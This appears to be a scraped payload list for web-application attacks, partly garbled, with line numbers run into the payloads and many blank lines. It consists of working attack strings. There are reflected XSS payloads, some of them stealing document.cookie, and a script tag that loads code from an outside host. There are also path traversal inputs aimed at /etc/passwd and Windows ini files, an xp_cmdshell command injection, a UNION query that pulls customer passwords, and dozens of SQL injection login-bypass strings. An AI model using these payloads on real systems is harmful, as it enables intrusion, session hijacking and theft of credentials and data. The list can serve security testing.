1 ‘>
2 =‘>
3
4
5 %3Cscript%3Ealert(‘XSS‘)%3C/script%3E6
7
8 %0a%0a.jsp
9 %22%3cscript%3ealert(%22xss%22)%3c/script%3e10 %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd11 %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini12 %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e13 %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e14 %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html15 %3f.jsp16 %3f.jsp17
18
19 ?sql_debug=1
20 a%5c.aspx21 a.jsp/
22 a/
23 a?
24 ">
25 ‘;exec%20master..xp_cmdshell%20‘dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt‘--&&
26 %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E27 %3Cscript%3Ealert(document. domain);%3C/script%3E&
28 %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
29 1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
30 http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/passwd
31 ..\..\..\..\..\..\..\..\windows\system.ini32 \..\..\..\..\..\..\..\..\windows\system.ini33 ‘‘;!--"=&{()}
34
35
36
37
38
39
40
41
42
43
44 "";‘> out
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
69
70
71 getURL("javascript:alert(‘XSS‘)")72 a="get";b="URL";c="javascript:";d="alert(‘XSS‘);";eval(a+b+c+d);73
74 ">
75
76
77
78
79
80
81
82
83 PT src="http://xss.ha.ckers.org/a.js">
84 link
85 admin‘--
86 ‘or 0=0 --
87 "or 0=0 --
88 or 0=0 --
89 ‘or 0=0 #
90 "or 0=0 #
91 or 0=0#92 ‘or‘x‘=‘x93 "or"x"="x94 ‘) or (‘x‘=‘x95 ‘or 1=1--
96 "or 1=1--
97 or 1=1--
98 ‘or a=a--
99 "or"a"="a100 ‘) or (‘a‘=‘a101 ") or ("a"="a102 hi"or"a"="a103 hi"or 1=1 --
104 hi‘or 1=1 --
105 hi‘or‘a‘=‘a106 hi‘) or (‘a‘=‘a107 hi") or ("a"="a[/code]